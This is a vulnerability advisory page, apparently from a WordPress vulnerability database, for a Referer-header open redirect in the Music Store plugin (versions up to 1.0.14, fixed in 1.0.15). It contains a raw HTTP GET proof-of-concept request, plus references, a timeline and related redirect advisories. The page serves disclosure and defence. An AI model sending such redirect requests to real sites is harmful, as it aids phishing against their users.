Music Store <= 1.0.14 – Referer Header Open Redirect | Plugin Vulnerabilities

Description

The Music Store – WordPress eCommerce WordPress plugin was affected by a Referer Header Open Redirect security vulnerability.

Proof of Concept

GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://google.com/
Connection: keep-alive

Affects Plugins

Fixed in 1.0.15

References

URL

https://packetstormsecurity.com/files/#132841/

URL

https://seclists.org/fulldisclosure/2015/Jul/113

URL

https://plugins.trac.wordpress.org/changeset/1178058/

Classification

Type

REDIRECT

OWASP top 10

CWE

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

Verified

No

WPVDB ID

d73f6575-eb86-480c-bde1-f8765870cdd1

Timeline

Publicly Published

2015-07-25 (about 10 years ago)

Added

2015-07-25 (about 10 years ago)

Last Updated

2019-10-22 (about 6 years ago)

Other

Published

Title

Published

2025-10-01

Title

Meta Tag Manager < 3.3 - Contributor+ Open Redirect

Published

2023-10-12

Title

Responsive Column Widgets <= 1.2.7 - Open Redirect via responsive_column_widgets_link

Published

2024-01-17

Title

Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect

Published

2021-12-27

Title

WebP Converter for Media < 4.0.3 - Unauthenticated Open redirect

Published

2014-08-01

Title

Password Protected 1.4 - Login Process redirect_to Parameter Arbitrary Site Redirect